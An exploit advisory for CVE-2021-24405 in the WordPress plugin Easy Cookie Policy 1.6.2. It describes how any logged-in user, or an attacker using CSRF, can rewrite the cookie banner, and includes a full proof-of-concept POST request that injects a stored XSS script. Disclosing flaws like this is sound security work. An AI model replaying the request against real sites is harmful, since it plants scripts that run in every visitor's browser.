# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS# Date: 2/27/2021# Author: 0xB9# Software Link: https://wordpress.org/plugins/easy-cookies-policy/# Version: 1.6.2# Tested on: Windows 10# CVE: CVE-2021-244051. Description:
Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.
If users can't register, this can be done through CSRF.2. Proof of Concept:
POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript,/; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length:226
Origin: http://localhost
Connection: keep-alive
Host: localhost
Cookie:[Any authenticated user]
action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd
